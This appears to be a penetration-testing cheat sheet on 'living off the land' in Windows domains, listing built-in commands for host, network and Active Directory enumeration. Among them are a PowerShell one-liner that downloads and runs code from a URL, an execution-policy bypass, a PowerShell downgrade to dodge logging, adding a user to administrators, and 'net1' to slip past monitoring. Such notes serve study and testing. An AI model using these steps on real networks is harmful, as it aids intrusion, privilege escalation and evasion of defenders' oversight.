13. Living Off the Land
Key Concepts:
Stealth: Using built-in tools reduces the risk of detection.
Limited Resources: Assumes a managed host with no internet access or ability to upload tools.
Log Evasion: Techniques like downgrading PowerShell are explored.
1. Basic Enumeration Commands (CMD)
hostname # Prints the PC's name
[System.Environment]::OSVersion.Version # Prints the OS version
wmic qfe get Caption,Description,HotFixID,InstalledOn # Prints installed patches
ipconfig /all # Displays network adapter configurations
set # Lists environment variables
echo %USERDOMAIN% # Displays the domain name
echo %logonserver% # Prints the domain controller name
systeminfo # Provides a summary of host information2. PowerShell Enumeration
Get-Module # Lists loaded modules
Get-ExecutionPolicy -List # Prints execution policy settings
Set-ExecutionPolicy Bypass -Scope Process # Bypasses execution policy for the current process
Get-ChildItem Env: | ft Key,Value # Returns environment variables
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt # Retrieves PowerShell history
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>" # Downloads and executes a file from a URL
powershell.exe -version 2 # Downgrades PowerShell to version 2
Get-MpComputerStatus # Retrieves Windows Defender status
qwinsta # Lists active sessions3. Network Enumeration
arp -a # Lists ARP table entries
route print # Displays the routing table
netsh advfirewall show allprofiles # Displays firewall settings4. Windows Management Instrumentation (WMI)
wmic qfe get Caption,Description,HotFixID,InstalledOn # Prints patch information
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List # Displays host information
wmic process list /format:list # Lists running processes
wmic ntdomain list /format:list # Displays domain information
wmic useraccount list /format:list # Lists user accounts
wmic group list /format:list # Lists local groups
wmic sysaccount list /format:list # Dumps service account information5. Net Commands
net accounts # Displays password requirements
net accounts /domain # Displays domain password policy
net group /domain # Lists domain groups
net group "Domain Admins" /domain # Lists domain admin users
net group "domain computers" /domain # Lists domain computers
net group "Domain Controllers" /domain # Lists domain controllers
net group <domain_group_name> /domain # Lists users in a group
net groups /domain # Lists domain groups
net localgroup # Lists local groups
net localgroup administrators /domain # Lists domain administrators
net localgroup Administrators # Displays group information
net localgroup administrators [username] /add # Adds a user to the administrators group
net share # Lists shared resources
net user <ACCOUNT_NAME> /domain # Displays user information
net user /domain # Lists domain users
net user %username% # Displays current user information
net use x: \\computer\share # Mounts a share
net view # Lists network computers
net view /all /domain[:domainname] # Lists domain shares
net view \\computer /ALL # Lists computer shares
net view /domain # Lists domain PCs
net1 # A less monitored version of net6. Dsquery Enumeration
dsquery user # Lists domain users
dsquery computer # Lists domain computersKey Takeaways
Windows provides numerous built-in tools for AD enumeration.
PowerShell is a powerful tool for both host and network reconnaissance.
WMI and net commands offer extensive domain information.
Dsquery is extremely useful for querying Active Directory.
Downgrading PowerShell can hinder logging.
net1can be used to bypass some monitoring systems.
Last updated